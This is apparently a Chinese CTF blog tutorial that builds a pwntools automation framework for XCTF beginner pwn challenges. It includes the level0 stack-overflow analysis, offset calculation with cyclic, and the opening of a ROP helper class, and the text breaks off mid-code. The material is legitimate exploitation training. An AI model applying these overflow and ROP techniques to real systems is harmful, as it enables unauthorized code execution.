从零构建Pwn自动化利用框架:以攻防世界入门题为例的Python实战
如果你已经接触过一些逆向工程,对栈溢出、ROP这些名词不再陌生,但每次面对新的Pwn题目时,仍然需要手动计算偏移、查找地址、拼接payload,那么这篇文章就是为你准备的。我们将从攻防世界(XCTF)的三个经典入门题目入手,但不止步于解题本身——而是构建一个可复用的Python自动化利用框架。这个框架能帮你把重复性的工作交给代码,让你更专注于漏洞原理和利用链的构建。
我刚开始玩CTF时,每次写exp脚本都要从头开始,调试过程更是痛苦。后来发现,很多Pwn题目的利用模式其实有规律可循,完全可以通过模块化的代码来抽象这些共性。今天分享的这套思路,是我在带战队训练时逐渐完善的,特别适合那些已经掌握基础但想提升效率的选手。
1. 环境搭建与工具链配置
在开始编写自动化脚本之前,我们需要一个稳定、高效的开发环境。很多人习惯在本地安装各种工具,但版本冲突、依赖问题经常让人头疼。我推荐使用Docker容器化的方案,既能保证环境一致性,又方便团队共享。
1.1 基于Docker的Pwn开发环境
创建一个Dockerfile来定义我们的环境:
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y \
python3 python3-pip \
gdb gdb-multiarch \
git curl wget \
libc6-dev-i386 \
&& rm -rf /var/lib/apt/lists/*
RUN pip3 install pwntools \
ropper \
capstone \
keystone-engine \
unicorn \
&& echo "set disassembly-flavor intel" > /root/.gdbinit
WORKDIR /workspace
构建并运行容器:
docker build -t pwn-env .
docker run -it --rm -v $(pwd):/workspace pwn-env /bin/bash
提示:在容器内工作可以避免污染本地环境,特别是处理不同架构的二进制文件时,交叉编译工具链的配置会简单很多。
1.2 Pwntools的深度配置
Pwntools是Python中用于CTF的瑞士军刀,但很多人只用了它最基本的功能。下面是一些高级配置技巧:
from pwn import *
# 设置全局上下文,避免在每个脚本中重复配置
context.update(
arch='amd64', # 默认架构
os='linux', # 操作系统
log_level='debug', # 调试信息级别
terminal=['tmux', 'splitw', '-h'] # 自动分屏调试
)
# 自定义日志格式,让输出更清晰
import logging
logging.getLogger("pwnlib").setLevel(logging.WARNING)
我习惯在项目根目录创建一个config.py文件,存放所有题目的连接信息:
# config.py
TARGETS = {
'level0': {
'host': '61.147.171.105',
'port': 63501,
'binary': './level0',
'libc': None
},
'level2': {
'host': '61.147.171.105',
'port': 52080,
'binary': './level2',
'libc': None
},
# 更多题目配置...
}
1.3 自动化信息收集脚本
每次分析新题目时,我们都需要执行checksec、file、strings等命令。把这些操作封装起来:
import subprocess
from pathlib import Path
class BinaryAnalyzer:
def __init__(self, binary_path):
self.path = Path(binary_path)
self.info = {}
def collect_info(self):
"""收集二进制文件的所有基本信息"""
self._checksec()
self._file_info()
self._strings_analysis()
self._symbols_analysis()
return self.info
def _checksec(self):
"""使用checksec检查保护机制"""
cmd = ['checksec', '--file', str(self.path)]
result = subprocess.run(cmd, capture_output=True, text=True)
self.info['checksec'] = result.stdout
def _file_info(self):
"""获取文件类型和架构信息"""
cmd = ['file', str(self.path)]
result = subprocess.run(cmd, capture_output=True, text=True)
self.info['file'] = result.stdout
def _strings_analysis(self):
"""提取字符串并分类"""
cmd = ['strings', str(self.path)]
result = subprocess.run(cmd, capture_output=True, text=True)
strings = result.stdout.split('\n')
# 分类字符串
self.info['strings'] = {
'libc_functions': [s for s in strings if 'libc' in s.lower()],
'interesting': [s for s in strings if any(x in s for x in ['flag', 'bin/sh', 'cat'])]
}
这个分析器可以快速给出目标程序的概况,节省手动检查的时间。
2. Level0:栈溢出与直接跳转的自动化
Level0是攻防世界Pwn新手区最简单的题目之一,但它展示了最经典的栈溢出利用模式。我们先手动分析,然后看看如何自动化这个过程。
2.1 手动分析过程
用我们刚才写的分析器跑一下:
analyzer = BinaryAnalyzer('./level0')
info = analyzer.collect_info()
print(info['checksec'])
输出会显示:
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
关键信息:64位程序,没有栈保护(No canary),没有地址随机化(No PIE)。这意味着我们可以直接覆盖返回地址,而且地址是固定的。
用IDA打开,找到callsystem函数的地址是0x400596。查看vulnerable_function:
ssize_t vulnerable_function() {
char buf[136]; // 0x88字节
return read(0, buf, 0x200); // 可以读0x200字节,明显溢出
}
计算偏移:buf大小136字节(0x88),加上保存的rbp8字节,总共144字节后才是返回地址。
2.2 自动化偏移计算
手动计算偏移容易出错,特别是当栈布局复杂时。我们可以用pwntools的cyclic功能自动化:
from pwn import *
def find_offset(binary_path, pattern_length=300):
"""自动化查找溢出偏移量"""
# 本地运行程序
p = process(binary_path)
# 生成唯一模式串
pattern = cyclic(pattern_length)
p.sendline(pattern)
# 等待崩溃,获取崩溃时的指令指针
p.wait_for_close()
core = p.corefile
# 查找模式串在崩溃时的位置
offset = cyclic_find(core.read(core.rsp, 8))
p.close()
return offset
# 使用示例
offset = find_offset('./level0')
print(f"偏移量: {offset}") # 应该输出144
2.3 自动化ROP链构建
对于Level0这种简单情况,我们只需要跳转到callsystem函数。但我们可以构建一个更通用的跳转器:
class SimpleROP:
def __init__(self, binary_path):
self.elf = ELF(binary_path)
self.offset = None
扫一扫
&spm=1001.2101.3001.5002&articleId=152595438&d=1&t=3&u=841307bcb5d642fbaa536cd5ff1f7002)
4397
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
